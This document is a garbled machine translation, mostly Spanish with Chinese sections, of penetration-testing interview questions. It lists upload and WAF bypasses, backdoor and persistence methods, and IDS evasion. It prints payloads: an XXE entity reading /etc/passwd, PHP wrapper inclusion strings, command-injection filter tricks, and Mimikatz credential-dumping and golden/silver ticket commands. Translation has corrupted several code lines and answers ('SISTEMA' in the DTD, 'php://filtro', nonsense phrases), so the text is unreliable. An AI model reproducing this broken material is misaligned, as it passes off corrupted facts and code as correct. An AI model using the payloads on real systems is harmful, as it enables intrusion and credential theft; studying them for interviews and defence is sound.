Copia de seguridad: haga una copia de seguridad de los archivos del servidor y compare los archivos que han cambiado antes y después de la invasión.
Detección de fugas: utilice los pasos anteriores para encontrar debilidades comerciales y solucionarlas.
Antivirus: elimine puertas traseras, webshells y cuentas de administración dejadas por piratas informáticos
Trazabilidad: a través de dirección IP del hacker, método de intrusión, etc.
Registros: Archivo, Prevención
Pregunta 26: Seguridad interna de la empresa
Respuesta:
El aislamiento de la red de nombre real y los segmentos de red importantes prohíben el acceso a cualquier dispositivo USB
Deshabilitar la vinculación de direcciones IP y MAC de la red WIFI
Implementar equipos de monitoreo de red, IDS, IPS.
Formación periódica para mejorar la concienciación sobre la seguridad de los empleados.
Pregunta 27: Cómo probar el negocio antes de que esté en línea y desde qué ángulos
Respuesta:
Pruebas de seguridad: búsqueda de vulnerabilidades de productos, vulnerabilidades de páginas, vulnerabilidades de servicios, filtración de información confidencial, vulnerabilidades lógicas, contraseñas débiles
Pruebas de rendimiento: pruebas de estrés
Pruebas de integridad funcional
Pregunta 28: La aplicación tiene una vulnerabilidad, pero no se puede reparar ni desactivar ¿Qué debes hacer?
Respuesta:
Restringir el acceso a la lista blanca de IP
Utilice WAF, IDS, equipos de firewall
Pregunta 29: ¿Cómo protegerse contra CSRF?
Respuesta:
Validar el campo de referencia HTTP
Agregue el campo Token y verifique
Agregue campos personalizados y verifique
Pregunta 30: ¿Cómo evitar la carga de archivos?
Respuesta:
Omisión WAF:
Modificar campos del formulario de carga
Reemplazo de caso de campo de formulario
Agregar o reducir espacios para formar campos
Concatenación de cadenas de campos de formulario
Cree un formulario de carga de archivos duales y cargue archivos duales al mismo tiempo
derivación de codificación
Omisión de relleno de datos basura
Omisión de mayúsculas y minúsculas en el nombre de archivo
Omisión de detección del servidor:
Omisión de tipo MIME
Captura de paquetes de detección JS frontal y omisión de modificación de paquetes
Omisión de lista negra: php3, asa, ashx, funciones de Windows (test.asp_, funciones de transmisión), vulnerabilidades de análisis de Apache
La detección de contenido de imagen utiliza el caballo de imagen para evitar la omisión de .htassess
Omisión de detección de lista blanca:
Truncar omisión de carga
Vulnerabilidad de análisis de IIS6/7/7.5, vulnerabilidad de análisis de versión baja de nginx
omisión de inclusión de archivos
Pregunta 31: Puntos de utilización relacionados con el código de verificación
Respuesta:
Reutilización del código de verificación
El código de verificación es identificable.
Código de verificación no válido
Código de verificación DDOS
Pregunta 32: ¿Qué probarás para las cookies?
Respuesta:
inyección SQL
xss
Omisión de permiso
Se filtró información sensible
Pregunta 33: ¿Nombre varios tipos de vulnerabilidades de lógica empresarial?
Respuesta:
任意用户密码重置
短信轰炸
订单金额修改
忘记密码绕过
恶意刷票
验证码复用
问题34:简述文件包含漏洞
答案:
调用文件包含函数时,未严格限制文件名和路径,如include()、require()等函数
问题35:业务逻辑漏洞,用户任意密码重置有什么例子,因为什么因素导致的?
答案:
普通用户重置管理用户密码
普通用户重置普通用户密码
未设置用户唯一Token,导致越权
问题36:渗透测试过程中发现一个只能上传zip文件的功能,有什么可能的思路?
答案:
shell压缩上传,程序自解压getshell
尝试解析漏洞getshell
寻找文件包含漏洞
木马钓鱼管理员
问题37:为什么aspx木马权限比asp大?
答案:
aspx使用的是.net技术,IIS中默认不支持,ASPX需要依赖于.net framework,ASP只是脚本语言 入侵的时候asp的木马一般是guest权限APSX的木马一般是users权限
问题38:只有一个登录页面有哪些思路?
答案:
SQL注入、万能密码
暴力破解
权限绕过
目录扫描
敏感信息泄露
问题39:请求头中哪些是有危害的?
答案:
COOKIE注入
user-agent注入
X-Forwarded-For注入
Referer注入
问题40:谈谈水平/垂直/未授权越权访问的区别?
答案:
水平越权:普通用户越权访问普通用户
垂直越权:普通用户越权访问管理用户
未授权访问:权限控制不严,导致无需登录访问已登录用户页面
问题41:xss有什么?执行存储型的xss的危害和原理
答案:
存储型、反射型、DOM型
存储型XSS是指应用程序通过Web请求获取不可信赖的数据,在未检验数据是否存在XSS代码的情况下,便将其存入数据库
存储型XSS危害:
窃取用户Cookie
XSS钓鱼攻击
XSS蠕虫攻击
获取键盘记录
获取用户信息
获取屏幕截图
问题42:主机疑似遭到入侵,要看哪里的日志
答案:
系统登录日志
服务访问日志
网站日志
数据库日志
问题43:python常用的标准库
答案:
正则表达式 re
时间模块 time
随机数 random
操作系统接口 os
科学计算 math
网络请求 urlib
http库 requests
Biblioteca de rastreo Scrapy
Subprocesos de biblioteca de subprocesos múltiples
Pregunta 44: ¿Cuál es la diferencia entre reverse_tcp y bind_tcp?
Respuesta:
reverse_tcp: la máquina de ataque establece un puerto y una IP. La carga útil se ejecuta en la máquina de prueba para conectarse al puerto de la IP de la máquina de ataque. En este momento, si la máquina de ataque monitorea el puerto, se encontrará que la máquina de prueba se ha conectado, es decir, la máquina controlada se conectará activamente con nosotros.
bind_tcp: la máquina atacante establece un puerto (LPORT) y la carga útil se ejecuta en la máquina de prueba para abrir el puerto para que la máquina atacante pueda acceder. En otras palabras, nos conectamos activamente a la máquina controlada y usamos reverse_tcp. más seguro y generalmente no será descubierto por el firewall.
Pregunta 45: ¿Qué problemas pueden ocurrir durante el proceso de autenticación de OAuth y qué tipo de vulnerabilidades pueden resultar?
Respuesta:
CSRF
La verificación de redirección_uri no es estricta.
Paso de parámetro incorrecto
Pregunta 46: Cómo obtener la IP real de un sitio web que tiene CDN
Respuesta:
ping global
Consultar registros de análisis históricos.
Probar archivos como phpinfo, etc.
Utilice la ejecución de comandos para conectarse a nuestro servidor o DNSlog
Buscando configuración del sitio web
A través del nombre de dominio de segundo nivel
Escanea toda la red y coincide con el título.
Pregunta 47: ¿Cómo lograr dominios cruzados?
Respuesta:
jsonp
CORS intercambio de recursos entre dominios
Solicitudes de proxy entre dominios
Método HTML5 postMensaje
Modificar document.domain entre subdominios
Basado en el protocolo websocket HTML5
http://document.xxx + marco flotante
Pregunta 48: ¿Cuál es la diferencia entre dominio cruzado jsonp y dominio cruzado CORS?
Respuesta:
La compatibilidad con el navegador jsonp es buena, CORS no es compatible con navegadores IE9 e inferiores
jsonp solo admite GET, CORS admite todo tipo de solicitudes HTTP, jsonp solo envía una solicitud una vez y CORS envía solicitudes complejas dos veces.
Pregunta 49: ¿Algoritmo? ¿Has aprendido sobre clasificación?
Respuesta:
Ordenamiento de burbuja
clasificación de selección
tipo de inserción
Pregunta 50: ¿Explotación de vulnerabilidad SSRF?
Respuesta:
Lectura de archivos locales
Detección de servicios, escaneo de puertos.
Ataque intranet redis, mysql, fastcgi y otros servicios
• Los protocolos utilizados son: http/s, file, gopher, tftp, dict, ssh, telnet
Pregunta 51: ¿Métodos comunes de puerta trasera?
Respuesta:
Ventanas:
El registro se inicia automáticamente
puerta trasera de cambio
software de control remoto
shell web
Agregar usuario administrativo
usuario sombra
tareas programadas
secuestro de dll
secuestro de registro
puerta trasera MBR
puerta trasera WMI
Registro de contraseña de administrador
Linux:
puerta trasera SSH
puerta trasera SUID
Tareas programadas de crontab
puerta trasera PAM
Agregar cuenta de administrador
rootkit
Pregunta 52: ¿Cómo evitar las restricciones de acceso al directorio open_basedir?
Respuesta:
Uso de la función de ejecución de comandos para omitir
Utilice la función symlink() para omitir
bypass de pseudoprotocolo global
Pregunta 53: ¿Cuáles son los problemas comunes en la auditoría de código PHP?
Respuesta:
Cualquier método de empalme de parámetros puede producir inyección SQL (un lugar común)
Cobertura variable causada por el registro variable global.
Ejecución de código causada por parámetros de escritura sin filtrar
Acceso a funciones en segundo plano causado por omisión en la verificación de permisos
Interfaz para subir cualquier archivo
deserializar la vulnerabilidad de deserialización
Pregunta 54: En el enfrentamiento rojo-azul, ¿el escenario y la postura del equipo azul contraatacando al equipo rojo?
Respuesta:
Pesca, Miel, Hormiga Espada RCE
Pregunta 55: Tareas programadas de Linux, ¿qué haría un hacker para ocultar sus tareas programadas?
Respuesta:
Tareas temporales: en, comandos por lotes
Pregunta 56: ¿Cuántas formas comunes de obtener shell sin autorización de Redis?
Respuesta:
Shell de escritura de ruta absoluta web
Escriba la clave pública ssh para obtener permisos del servidor
Copia maestro-esclavo getshell
Pregunta 57: ¿Métodos de ataque JWT? (encabezado, carga útil, firma)
Respuesta:
Establecer el algoritmo de cifrado en vacío omite la autenticación.
Explotación de parámetros clave débiles para niños: lectura de archivos arbitrarios, inyección de SQL, inyección de comandos
Firma no verificada, contenido recodificado
Pregunta 58: Vulnerabilidades del middleware JAVA, ¿cuáles son algunos ejemplos?
Respuesta:
Deserialización de JBoss
Deserialización de WebLogic
Escritura de archivos arbitrarios en Tomcat, contraseña débil + getshell en segundo plano
Pregunta 59: ¿Para qué vulnerabilidades se puede utilizar la extracción de DNS?
Respuesta:
inyección ciega SQL
Ejecución de comandos sin eco
mecanografía táctil XXE
Mecanografía táctil de la SSRF
Pregunta 60: Solo HTTP prohíbe que JS lea la información de las cookies. ¿Cómo evitar esto para obtener cookies?
Respuesta:
Secuestrar página de inicio de sesión para evitar phishing
Pregunta 61: ¿Resumen de las vulnerabilidades del middleware?
Respuesta:
Aquí sólo escribimos sobre vulnerabilidades comúnmente explotadas.
IIS:
Vulnerabilidad PUT de IIS6.0
Vulnerabilidad de ejecución remota de código IIS6.0
Vulnerabilidad de análisis de IIS6.0 IIS habilita la vulnerabilidad de nombres de archivos cortos .net
Vulnerabilidad de análisis de IIS7.0/7.5
Apache:
Vulnerabilidad de análisis de extensión desconocida
Análisis de vulnerabilidades y cruce de directorios causado por errores de coordinación
Nginx:
Análisis de vulnerabilidades y recorrido de directorios causado por errores de configuración
Gato:
Vulnerabilidades de ejecución de código arbitrario y escritura de archivos arbitrarios causadas por errores de configuración
Contraseña débil + implementación del paquete de guerra en segundo plano de gestión getshell manager/html
Explosión de contraseñas débiles en el backend de administración
JJefe:
Vulnerabilidad de deserialización 5.x/6.x (CVE-2017-12149)
Deserialización de JMXInvokerServlet
Deserialización de EJBInvokerServlet
Acceso no autorizado a la consola JMX
Implementación del paquete de guerra en segundo plano de administración y contraseña débil getshell
WebLogic:
Vulnerabilidad de deserialización de XMLDecoder (CVE-2017-10271 y CVE-2017-3506)
wls9_async_response, vulnerabilidad de ejecución remota de código de deserialización wls-wsat (CVE-2019-2725)
Vulnerabilidad de ejecución de comandos de deserialización de componentes principales de WLS (CVE-2018-2628)
Implementación del paquete de guerra en segundo plano de administración y contraseña débil getshell
Pregunta 62: ¿Habla sobre la idea de elevar privilegios en sistemas Windows y sistemas Linux?
Respuesta:
Ventanas:
Escalada de privilegios de base de datos: mysql, sqlserver
Escalada de privilegios de software de terceros: secuestro de DLL de serv-u
Escalada de privilegios de vulnerabilidad de desbordamiento del kernel del sistema: serie CVE
Linux:
escalada de privilegios sudo
escalada de privilegios suicidas
escalada de privilegios del kernel de redis
Pregunta 63: ¿Qué frameworks tiene Python y qué vulnerabilidades han aparecido en ellos?
Respuesta:
Ejecución de código arbitrario de Django, Flask, Scrapy Django
Inyección de plantilla de matraz
Pregunta 64: La diferencia entre la penetración de programas pequeños y la penetración ordinaria
Respuesta:
El proceso de penetración permanece sin cambios, todavía se trata de capturar paquetes y modificar los parámetros para la penetración.
La diferencia es que el mini programa descargará el paquete localmente y podrá descompilarlo utilizando la herramienta de recuperación inversa.
Pregunta 65: Cuatro componentes principales de las pruebas de vulnerabilidad en la propia aplicación
Respuesta:
Componente de actividad:
La actividad vincula el protocolo navegable y personalizado.
Vulnerabilidad del Administrador de actividades
Componente de servicio:
Escalada de privilegios, ataques de denegación de servicio
Componente receptor de transmisión:
Gestión inadecuada de permisos
Vulnerabilidad de exportación de BroadcastReceiver
El componente de transmisión de registro dinámico expone vulnerabilidades
Componente del proveedor de contenido:
Vulnerabilidad de permisos de lectura y escritura
Vulnerabilidad de inyección SQL en Content Provider
Vulnerabilidad de cruce del directorio de archivos del proveedor
Pregunta 66: Principios de protección IDS/IPS e ideas de derivación
Respuesta:
principio:
IDS funciona en la capa de red y se implementa en modo de derivación. Detecta ataques capturando y analizando el tráfico de la red. IPS generalmente también pasa por alto la capa de red. Puede entenderse como un IDS con capacidades de bloqueo. Es una versión mejorada de IDS ( también hay ataques detectados por IDS (modo de enlace de dispositivo que notifica al dispositivo de bloqueo que realice acciones de bloqueo), que puede cubrir la capa de red y la capa de aplicación.
Derivación:
Fragmentación de TCP: dividir en dos paquetes TCP
Fragmentación de IP: el principio es el mismo que el de la fragmentación de TCP, pero la pérdida de paquetes es grave
Error de programa/problema de rendimiento: enviar una gran cantidad de paquetes no válidos, consumiendo el rendimiento de IPS
Falsificar estados TCP: evitar IPS basado en seguimiento con estado
Omisión de IPV6: uso de omisión de dirección IPV6
Pregunta 67: Utilización del csrf de json
Respuesta:
Utilice XMLHttpRequest y fetch para construir solicitudes JSON, y utilice los saltos 307 y entre dominios de Flash para evitar las restricciones de encabezados personalizados http
Pregunta 68: ¿Qué vulnerabilidades se pueden probar utilizando paquetes de datos en formato json?
Respuesta:
csrf json secuestrar xss
Pregunta 69: Describa brevemente el principio y el método de utilización de la vulnerabilidad xxe.
Respuesta:
principio:
Inyección de entidades externas XML: Cuando una aplicación analiza la entrada XML, cuando se permite hacer referencia a entidades externas, se puede construir contenido malicioso y pueden ocurrir vulnerabilidades.
usar:
Definición del tipo de documento DTD
Declaración interna DTD<!DOCTYPE elemento raíz[declaración de elemento]>
Referencia externa de DTD <!DOCTYPE nombre del elemento raíz SISTEMA "URI de DTD externo">
Referencia a DTD pública<!DOCTYPE nombre del elemento raíz PUBLIC "Nombre de identificación de DTD" "URI de DTD pública">
ENTIDAD
<?xml versión="1.0" codificación="utf-8"?>
<!DOCTYPE raíz [
<!ENTITY x "¡Primer parámetro!">
<!ENTITY y "Segundo Parámetro!">
<!ENTITY xxe SISTEMA "archivo:///etc/passwd">
]>
<root><x>&x;</x><y>&y;</y><xxe>&xxe;</xxe></root
Imágenes de Internet
Pregunta 70: ¿Cómo recopilar información en el servidor de la intranet?
Respuesta:
Utilice scripts para recopilar: información del puerto, información del servicio
Colección de comandos del sistema: los usuarios del dominio pueden usar comandos de dominio para recopilar información del dominio, grupos de red "usuarios del dominio" /dominio, etc.
Escaneo completo de la herramienta de escaneo de puertos
Recopilación de información local: contraseña de administración, registro de inicio de sesión para ver la IP del administrador, recopilación de contraseñas de servicio, visualización de información del segmento de red, visualización del registro histórico
Vulnerabilidad de transferencia de dominio DNS de intranet
Pregunta 71: Si se desactiva una máquina en la capa límite de la intranet, ¿cómo detectar otras máquinas en la intranet?
Respuesta:
Primero use el proxy para ingresar al registro de la intranet, ew, etc.
En segundo lugar, recopile información localmente, incluida la IP del administrador, el servicio del puerto, la contraseña de la cuenta, la información de enrutamiento, la información del segmento de red, etc.
La tercera extensión es penetrar en los segmentos de red recopilados y utilizar servicios comunes: SMB, MYSQL, SQLserver, ftp, telnet, etc.
Utilice scripts livianos o escáneres para escanear, pero generalmente no lo haga, ya que el movimiento es demasiado grande y los administradores pueden descubrirlo fácilmente.
Pregunta 72: Diferencias y métodos de uso de los billetes de oro y de plata de la intranet
Respuesta:
Notas Doradas:
Una vez que un atacante tiene acceso de administrador a un controlador de dominio, se puede utilizar Mimikatz para extraer los hashes de contraseña de la cuenta KRBTGT.
registro mimikatz "lsadump::dcsync /dominio:test.local /usuario:krbtgt"
Generar ticket
kerberos::golden /admin:Administrador /dominio:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
/admin: nombre de usuario falso
/dominio: nombre de dominio
/sid: valor SID, tenga en cuenta que se elimina el último valor siguiente
/krbtgt: valor HASH de krbtgt
/ticket: nombre del ticket generado //¡No es un comando escrito en la memoria!
Cuenta de dominio normal, utilice boletos dorados para crear una cuenta de administración de dominio
imitar # kerberos::purge
mimikatz # kerberos::ptt Administrator.kiribi //Importar tickets a la memoria
En este punto, la cuenta de administración del dominio se creó exitosamente.
Notas de Plata:
Obtenga SID y NTLM
mimikatz.exe "privilegio::depurar" "sekurlsa::contraseñas de inicio de sesión" "salir">log.txt
billetes falsos
kerberos::golden /dominio:cyberpeace.com /sid:S-1-5-21-2718660907-658632824-2072795563 /target:scene.abcd.com /service:cifs /rc4:9a68826fdc2811f20d1f73a471ad7b9a /user:test /ptt
//Instrucciones
kerberos::golden /dominio:<nombre de dominio> /sid:<SID de dominio> /target:<nombre de host del servidor de destino> /servicio:<tipo de servicio> /rc4:<NTLM Hash> /usuario:<nombre de usuario> /ptt
Falsificación de nombres de servicios
Cuenta de gestión de dominio obtenida con éxito
dir \\scene.cyberpeace.com\c$
La diferencia entre billetes dorados y plateados:
Los permisos obtenidos son diferentes.
Golden Ticket: TGT falso que puede obtener acceso arbitrario a Kerberos
Billete: ST falsificado, solo puede acceder a servicios específicos, como CIFS
El proceso de certificación es diferente.
Golden Ticket: Interactúa con KDC, pero no con AS
Billete: Interacción entre diferentes KDC y acceso directo al servidor
Los métodos de cifrado son diferentes.
Boleto dorado: cifrado por krbtgt NTLM Hash
Billete: cifrado por cuenta de servicio NTLM Hash
Puntuación de las preguntas de la entrevista
Pregunta 1: ¿En cuántos tipos de inyección SQL se pueden dividir aproximadamente a partir de la respuesta recibida del servidor? (5 puntos)
Respuesta:
Inyección SQL basada en informes de errores, consultas conjuntas, inyección de pila, inyección SQL ciega (inyección booleana, inyección retrasada, inyección de errores)
Inyección de errores (diez funciones comunes de informe de errores: solo responda las tres primeras)
extraer valor(),
piso(),
actualizarxml(),
Exp(),
polígono(),
multipunto(),
cadena multilineal(),
cadena de líneas(),
multipolígono(),
Colección Geometría())
Pregunta 2: ¿Cómo escribir SQL Shell y qué hacer si se filtran las comillas simples? (10 puntos)
Respuesta:
Primero determine si se cumplen las siguientes condiciones:
Si el parámetro Secure_file_priv está vacío, permiso de root, permiso de archivo, GPC está desactivado, conoce la ruta del sitio web relevante y las funciones de lectura y escritura relacionadas:
Función de escritura de archivo: en el archivo de salida, en el archivo de volcado
1. La función de archivo de salida puede exportar varias líneas, mientras que el archivo de volcado solo puede exportar una línea de datos. La función de archivo de salida tiene una conversión de formato especial al escribir datos en un archivo.
2. dumpfile mantiene el formato de datos original
Función de lectura de archivos: load_file()
Determine si existe un permiso de escritura relevante. Si es así, use la función de escritura de archivos correspondiente para escribir código en la ruta del sitio web. Hay filtrado de comillas simples. Puede codificar el contenido de una oración en hexadecimal o intentar usar bytes anchos. Si no hay filtrado, utilice sqlmap –os-shell directamente.
Pregunta 3: Métodos de derivación comunes de inyección SQL (10)
Respuesta:
Filtrado de palabras clave comunes: mayúsculas y minúsculas, omisión de doble escritura, conversión base
Omisión de espacios en blanco: comentarios en línea
y, o bypass: sustitución simbólica
Pregunta 4: La diferencia entre las versiones de MySQL inferiores a 5.0 y superiores a 5.0 (5)
Respuesta:
La versión MySQL5.0 agrega soporte para procedimientos baiStored, vistas, cursores, activadores y transacciones XA.
Se agregó la base de datos del sistema INFORATION_SCHEMA.
Pregunta 5: ¿En cuántos tipos de xss se dividen aproximadamente y cuáles son las diferencias entre cada tipo? (5 puntos)
Respuesta:
Tipo de almacenamiento, tipo reflectante, tipo DOM
Tipo de almacenamiento:
Almacena el código de ataque XSS relevante directamente en la base de datos y solo requiere que el usuario acceda a la interfaz relevante para activar la ejecución del código relevante. No es necesario que el usuario lo active activamente.
Tipo reflectante:
El código xss relevante se refleja en la respuesta de la página relevante, lo que requiere que el usuario relevante lo active activamente y el usuario envíe datos.
tipo DOM:
Forme xss modificando el nodo DOM de la página
Pregunta 6: Cómo defenderse contra xss 10
Respuesta:
Filtre todo el contenido enviado, filtre los parámetros en la URL y filtre el contenido relevante que provocará la ejecución del script; luego, dinámicamente
La forma más confiable de codificar la salida de contenido a la página es filtrar el código HTML antes de generar todos los puntos de salida. Se recomienda utilizar una biblioteca js madura para filtrar y escribir sus propias reglas regulares.
Propenso a errores.
Pregunta 7: Métodos de uso comunes para cargar archivos (10 puntos)
Pregunta 1: métodos de derivación comunes
Respuesta:
Verificación js frontal: deshabilite js o cambie directamente el paquete con burp
Verificación del tipo de archivo: modificar el encabezado http Tipo de contenido, tipo MIME
Lista negra: cargar sufijo analizable especial, cargar .htaccess, .user.ini, omitir mayúsculas y minúsculas, omitir punto, espacio, ::$DATA omitir, cooperar con la vulnerabilidad de análisis, omitir nombre de doble sufijo
Lista blanca: omisión de MIME, truncamiento %00, truncamiento 0x00, truncamiento 0x0a
Verificación del contenido del archivo: verificación del encabezado del archivo, ruptura de getimagessize(), ruptura de exif_imagetype(), representación secundaria
Otros: competencia condicional
Análisis de vulnerabilidades con middleware relacionado: vulnerabilidades de análisis iis6.0, iis7.0, vulnerabilidades de análisis iis7.5, vulnerabilidades de análisis de apache, vulnerabilidades de análisis de nginx
Pregunta 2: Determine el método para resolver el nombre del sufijo
Respuesta:
prueba de pelusa
Pregunta 8: método de omisión de una oración para cargar archivos 10
Respuesta:
Una frase sobre formas comunes de evitar los troyanos
Ejecutar comandos usando funciones poco comunes
Caso de palabra clave, empalme dinámico
Interferencia de caracteres especiales
Omisión de codificación, etc.
Pregunta 9: Inyección de comando de funciones peligrosas comunes (5 puntos)
Respuesta:
Funciones PHP:
• sistema
• ejecutivo
• pasar a través de
• shell_exec
• popen
• proc_open
• evaluar
• afirmar
• pasar a través de
• pcntl_exec
• call_user_func_array
• crear_función
Pregunta 10: Delimitadores de comandos comunes en php (5 puntos)
Respuesta:
%0a, \r, \n, ;, &, &&, |, ||
Pregunta 11: Métodos de omisión comunes (omisión de espacio, lista negra) (10 puntos)
Pregunta 1: Cómo omitir espacios
Respuesta:
• ${IFS} 其中{}用来截断,比如cat$IFS2会被认为IFS2是变量名。另外,在后面加个$可以起到截断的作用,一般用$9,因为$9是当前系统shell进程的第九个参数的持有者,它始终为空字符串
问题2: 黑名单绕过
答案:
• 续行符\
• 单引号ca’’t
• 通配符* fla*
• ?
• 连接符 cat /etc/pass'w'd
问题12:文件包含漏洞(10分)
问题1: 文件包含漏洞形式,常见的php函数
<?php include("inc/" . $_GET['file']); ?>
答案:
1. include(包含过程中出错会报错,不影响后续语句的执行)
2. include_once(仅包含一次)
3. require(包含过程中代码出错,后续代码不执行)
4. require_once(仅包含一次)
问题2: 常见的包含形式
答案:
1. 同目录包含直接加当前目录下的相关的文件
2. 目录遍历 ?file=../../../../../../../../../var/lib/locate.db
3. 日志注入 ?file=../../../../../../../../../var/log/apache/error.log
问题13:常见的php伪协的使用议以及相关的使用条件(10分)
答案:
常见的协议说出来即可
1. php://input
可以获取post数据流
使用条件:
allow_url_include=On
allow_url_fopen-Off/On
使用方法:
file =php://input
POST:phpinfo();
2. php://filter
可以获取指定文件的源码,但是当他与包含函数结合是,php://filter流会被当做php文件执行。所以我们一般对其进行编码,让其不执行。从而导致任意文件读取
使用条件:
allow_url_fopen=Off/On
allow_url_include=Off/On
使用方法;
?file=php://filtro/read=convert.base64-encode/resource=phpinfo.php
3. zip://
Puede acceder a los archivos en el paquete comprimido. Cuando se combina con la función de inclusión, la secuencia zip:// se ejecutará como un archivo PHP. Esto permite la ejecución de archivos arbitrarios. Tipos similares incluyen: zlib:// y bzip2://
Condiciones de Uso:
Debe ser un paquete comprimido zip (el sufijo no importa, siempre y cuando el formato del archivo sea zip).
enable_url_fopen=Desactivado/Activado
enable_url_include=Desactivado/Activado
PHP>=5.2
Instrucciones:
zip://[ruta absoluta al paquete comprimido]#[archivos en el paquete comprimido]
?archivo=zip://D:\zip.zip%23phpinfo.txt
4. far://
Al igual que zip://, están disponibles rutas absolutas y relativas.
Condiciones de Uso:
Debe ser un paquete comprimido zip (el sufijo no importa, siempre y cuando el formato del archivo sea zip).
enable_url_fopen=Desactivado/Activado
enable_url_include=Desactivado/Activado
PHP>=5.2
Instrucciones:
zip://[ruta absoluta al paquete comprimido]#[archivos en el paquete comprimido]
?file=zip://D:\zip.zip/phpinfo.php (la diferencia con zip:// es que uno es # y el otro es /)
5. datos: //
También similar a php://entrada
Condiciones de Uso:
enable_url_fopen=Activado
enable_url_include=Activado
Instrucciones:
?archivo=datos://,<?php phpinfo();
?archivo=datos://texto/plain,<php phpinfo();
?archivo=datos://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
?archivo=datos:texto/plain,<php phpinfo();
?archivo=datos:texto/sin formato;base64,PD9waHAgcGhwaW5mbygpPz4=
Pregunta 14: Dónde ocurren vulnerabilidades comunes en la lógica empresarial (10 puntos)
Respuesta:
1. Tipo de transacción
Modificar el precio pagado
Modificar estado de pago
Modificar la cantidad de compra a un número negativo
Modificar la cantidad para que sea un número negativo
Repetir solicitud exitosa
Manejo inadecuado de bloqueos simultáneos de bases de datos
2. Cuenta
Registro: sobrescriba el registro, intente repetir el nombre de usuario y recorra el registro para adivinar la cuenta existente.
Inicio de sesión: relleno de credenciales, secuestro de cuentas, intento de contraseña de cuenta para bloquear la cuenta
Recuperar contraseña: restablezca cualquier nombre de usuario. Después de restablecer la contraseña, la nueva contraseña está en el paquete de devolución. La lógica de verificación del token está en la interfaz. X-Forwarded-Host no se procesa correctamente.
Cambiar contraseña: Modifica la contraseña sin autorización. No hay verificación de la contraseña anterior al cambiar la contraseña.
Queja: falsificación de identidad, omisión lógica
Consulta de información: las restricciones de permisos inadecuadas pueden generar consultas no autorizadas y se pueden adivinar los ID de la información del usuario, lo que lleva a un cruce.
3. Código de verificación
Código de verificación: el código de verificación se puede reutilizar
Los códigos de verificación son predecibles
El código de verificación no es lo suficientemente fuerte
El código de verificación no tiene límite de tiempo o tiene un tiempo de caducidad largo
No hay límite en la cantidad de conjeturas para el código de verificación.
El código de verificación pasa parámetros especiales o no pasa parámetros para omitir
El código de verificación se puede obtener directamente del paquete devuelto.
El código de verificación no se actualiza o no es válido
El número de códigos de verificación es limitado.
El código de verificación se devuelve en el paquete.
Modificar la omisión de cookies
Modificar la omisión del paquete de devolución
El código de verificación se genera o verifica en el lado del cliente.
Los códigos de verificación pueden ser OCR o reconocerse mediante aprendizaje automático
El código de verificación se utiliza para bombardeos por SMS/correo electrónico
Pregunta 15: Existen varios tipos de vulnerabilidades no autorizadas (10 puntos)
Respuesta:
Acceso no autorizado
Anulación horizontal:
Un atacante puede acceder a los recursos de un usuario que tiene los mismos permisos que él.
El tipo de permiso permanece sin cambios, el ID cambia
Anulación vertical:
Los atacantes de bajo nivel pueden acceder a recursos de usuarios de alto nivel.
El ID de permiso permanece sin cambios pero el tipo cambia
Anulación cruzada:
Cambios de ID de permiso, cambios de tipo
Pregunta 16: ¿Qué debes hacer si consigues que se pruebe una estación? (10 puntos)
Respuesta:
1. Recopilación de información
1) Información relacionada con el servidor (IP real, tipo de sistema, versión, puertos abiertos, WAF, etc.)
2) Identificación de huellas dactilares del sitio web (incluidos cms, cdn, certificado, etc.), registros dns
3) c.Información de Whois, nombre, registro, correo electrónico, número de teléfono para verificación inversa (el correo electrónico se pierde en la base de datos del trabajador social, los trabajadores sociales se preparan, etc.)
4) Colección de nombres de subdominios, sitios secundarios, segmento C, etc.
5) Google piratea búsquedas dirigidas, archivos pdf, versiones de middleware, escaneo de contraseñas débiles, etc.
6) Escanee la estructura del directorio del sitio web para filtrar archivos confidenciales, como el backend, el banner del sitio web, los archivos de prueba, las copias de seguridad, etc.
7) Protocolo de transmisión, vulnerabilidades comunes, exp, código fuente de github, etc.
2. Minería de vulnerabilidad
1) Navegar por el sitio web para ver su tamaño, funciones, características, etc.
2) Escanear puertos, contraseñas débiles, directorios, etc., y realizar detección de vulnerabilidades en los puertos de respuesta, como rsync, heartbleed, mysql, ftp, ssh contraseñas débiles, etc.
3) XSS, inyección SQL, carga, inyección de comandos, CSRF, detección de seguridad de cookies, información confidencial, transmisión de datos de comunicación, craqueo por fuerza bruta, carga arbitraria de archivos, acceso no autorizado, acceso no autorizado, recorrido de directorio, inclusión de archivos, ataque de reproducción (bombardeo de SMS) ), detección de vulnerabilidades del servidor y, finalmente, el uso de herramientas de escaneo faltantes, etc.
3. Explotación de vulnerabilidades y escalada de privilegios
1) mysq| elevación de privilegios, elevación de privilegios de serv-u, elevación de privilegios de Oracle
2) escalada de privilegios de desbordamiento de Windows
3) Vaca sucia de Linux, vulnerabilidad del kernel que eleva los privilegios
4. Borrar datos de prueba e informes de salida.
1) Limpieza de registros y datos de prueba.
2) Resumen, informe de prueba de penetración de salida con plan de reparación.
5. Vuelva a probar
1) Verificar y descubrir si hay nuevas vulnerabilidades, generar informes y archivarlos.
Pregunta 17: ¿Qué sucede cuando encuentras una gran cantidad de nombres de dominio o accesos IP en los registros web (5 puntos)
Respuesta:
ddos o rastreador
Resumen de las preguntas de la entrevista sobre protección de red
Pregunta 1: Carga de archivos , ¿cómo omitir la lista negra y la lista blanca ?
Respuesta:
Sufijos, caracteres en mayúsculas y minúsculas::$DATA símbolos especiales, doble escritura (nombre de archivo con formato incorrecto))
La lista blanca es más segura. Modifique los tipos de archivos que se pueden cargar. %00 truncamiento, 0x00 truncamiento, char (0) MIME
Pregunta 2 : Principio de inyección SQL
Respuesta:
Los ataques de inyección SQL se llevan a cabo insertando consultas SQL maliciosas o agregando declaraciones en los parámetros de entrada de la aplicación, y luego analizándolas y ejecutándolas en el servidor SQL en segundo plano. Actualmente, los piratas informáticos lo utilizan para atacar la base de datos. Uno de los más comunes métodos utilizados.
Pregunta 3 : método de ataque SQL
Respuesta:
Consulta de unión, inyección ciega booleana, inyección de error, inyección de pila, retraso, inyección secundaria
Pregunta 4: Principio de la vulnerabilidad de inyección SQL
Respuesta:
El filtrado de datos del sitio web no es estricto, se basa demasiado en los datos ingresados por el usuario, no filtra los datos maliciosos ingresados por el usuario y ejecuta incondicionalmente los datos ingresados por el usuario como una declaración SQL, lo que lleva a la inyección SQL. vulnerabilidades Nacimiento
Pregunta 5: Informe de errores al inyectar funciones comunes
Respuesta:
updatexml(),piso(),extraervalor()
